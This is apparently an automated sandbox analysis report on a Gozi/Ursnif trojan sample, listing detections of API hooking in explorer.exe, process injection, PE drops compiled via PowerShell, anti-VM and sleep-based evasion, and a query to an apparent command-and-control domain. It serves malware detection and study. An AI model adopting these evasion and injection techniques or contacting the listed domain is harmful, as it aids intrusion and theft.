Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_010A7BE0 push ecx; ret 8_2_010A7BE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_010AB804 push 00000055h; iretd 8_2_010AB808
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_010AB6BE push ebp; retf 8_2_010AB6BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F2541F push ecx; ret 8_2_03F2542F
Source: C:\Windows\System32\control.exe Code function: 28_2_00E772FD push 3B000001h; retf 28_2_00E77302
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEAA72FD push 3B000001h; retf 36_2_0000020FDEAA7302
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_03055070 push ecx; ret 47_2_03055079
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_03053D42 push ss; ret 47_2_03053D43
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_0305541F push ecx; ret 47_2_0305542F
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_004012E6 LoadLibraryA,GetProcAddress, 8_2_004012E6
Binary contains a suspicious time stamp
Source: gozi.exe Static PE information: 0xBF44DD64 [Tue Sep 8 18:09:40 2071 UTC]
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5n300s0s.cmdline
Source: initial sample Static PE information: section name: .text entropy: 7.33101766252

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\5n300s0s.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\hscan34n.dll

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5696, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 5676, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4364, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match File source: 8.3.RegAsm.exe.330a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.RegAsm.exe.330a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.RegAsm.exe.33b8f40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.RegAsm.exe.33894a0.1.raw.unpack, type: UNPACKEDPE
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFC8BAF521C
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFC8BAF5200
Source: C:\Users\user\Desktop\gozi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6536, type: MEMORYSTR
Uses ping.exe to sleep
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\gozi.exe TID: 6140 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\gozi.exe TID: 7076 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3540 Thread sleep count: 59 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3540 Thread sleep count: 78 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3540 Thread sleep count: 41 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3540 Thread sleep count: 93 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1304 Thread sleep time: -90000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2268 Thread sleep time: -6456360425798339s >= -30000s
Found evasive API chain (date check)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\SysWOW64\cmd.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\gozi.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4982
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4237
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\cmd.exe API coverage: 3.9 %
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5n300s0s.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hscan34n.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F18409 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 8_2_03F18409
Source: explorer.exe, 0000001F.00000000.495166406.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001F.00000000.521666713.0000000008778000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 0000001F.00000000.495166406.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: RuntimeBroker.exe, 00000029.00000000.614665708.00000163C4E00000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001F.00000000.487973669.00000000067C2000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: mshta.exe, 00000012.00000002.422959033.000002BC06C24000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001F.00000000.495166406.00000000086C9000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: gozi.exe, 00000002.00000002.327636838.000000000153E000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F1B9D4 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 8_2_03F1B9D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F0E91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 8_2_03F0E91D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F22ECF lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 8_2_03F22ECF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_0303E91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 47_2_0303E91D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_0304B9D4 FindFirstFileW,FindNextFileW,FindClose,FreeLibrary, 47_2_0304B9D4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_03052ECF memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose, 47_2_03052ECF

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_004012E6 LoadLibraryA,GetProcAddress, 8_2_004012E6
Enables debug privileges
Source: C:\Users\user\Desktop\gozi.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\gozi.exe Memory allocated: page read and write | page guard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F016AF ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 8_2_03F016AF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_030316AF ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 47_2_030316AF

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: io.immontyr.com
Maps a DLL or memory area into another process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write